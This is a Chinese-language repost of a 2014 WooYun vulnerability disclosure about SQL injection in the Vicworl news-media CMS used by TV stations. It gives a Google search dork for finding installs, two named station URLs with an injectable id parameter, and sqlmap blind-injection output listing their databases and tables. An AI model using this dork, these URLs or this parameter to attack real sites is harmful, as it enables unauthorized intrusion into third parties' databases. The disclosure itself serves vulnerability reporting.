记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某新闻媒体系统通用型注入(威胁各大电视台)

2014-10-03 05:20

谷歌关键字:Powered by Vicworl home

【好吧,你们被墙了,我在纠结你们到时候怎么测试】



http://v.ntzx.cn/home.php?id=10

http://www.qzetv.net/home.php?id=1

拿了这两个网站测试了一下。只能盲注,所以太费时了··





漏洞证明:

[15:01:46] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.8

back-end DBMS: MySQL 5.0.11

[15:01:46] [INFO] fetching database names

[15:01:46] [INFO] fetching number of databases

[15:01:46] [INFO] retrieved:

[15:01:46] [WARNING] it is very important not to stress the network adapte

ndwidth during usage of time-based queries

[15:02:11] [ERROR] invalid character detected. retrying..

[15:02:11] [WARNING] increasing time delay to 6 seconds

5

[15:02:39] [INFO] retrieved: infor

[15:08:18] [ERROR] invalid character detected. retrying..

[15:08:18] [WARNING] increasing time delay to 7 seconds

mat

[15:12:03] [ERROR] invalid character detected. retrying..

[15:12:03] [WARNING] increasing time delay to 8 seconds

i

[15:14:19] [ERROR] invalid character detected. retrying..

[15:14:19] [WARNING] increasing time delay to 9 seconds

on_sc

[15:22:19] [ERROR] invalid character detected. retrying..

[15:22:19] [WARNING] increasing time delay to 10 seconds

[15:24:05] [ERROR] unable to properly validate last character value ('h').

hema

[15:25:48] [INFO] retrieved: mysql

[15:29:27] [INFO] retrieved: te

[15:31:41] [ERROR] invalid character detected. retrying..

[15:31:41] [WARNING] increasing time delay to 6 seconds

st

[15:33:38] [INFO] retrieved: vicworl

[15:40:09] [INFO] retrieved: wordpress

available databases [5]:

[*] information_schema

[*] mysql

[*] test

[*] vicworl

[*] wordpress







+-----------------+

| v_ |

| v_article |

| v_caller |

| v_comment |

| v_favorites |

| v_feedback |

| v_fprgetcode |

| v_friend |

| v_js |

| v_leaveword |

| v_loitype |

| v_message |

| v_photo |

| v_phototype |

| v_playersetting |

| v_setting |

| v_sitestyle |

| v_special |

| v_syslogtype |

| v_tags |

| v_template |

| v_topmedia |

| v_user |

| v_userlevel |

| v_vaborder |

| v_vasge |

| v_weblink |

+-----------------+

QQ图片20140704134853.jpg



QQ图片20140704134819.jpg





不知道是家里网速太差还是网站服务器太渣,跑的太费时了···仅仅是跑了数据库和表就花了我6个小时······

修复方案:

竟然没任何防注入的措施···此套系统好像是要商业出售的,卖几K把····

知识来源: www.wooyun.org/bugs/wooyun-2014-067374

阅读:145021 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某新闻媒体系统通用型注入(威胁各大电视台)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云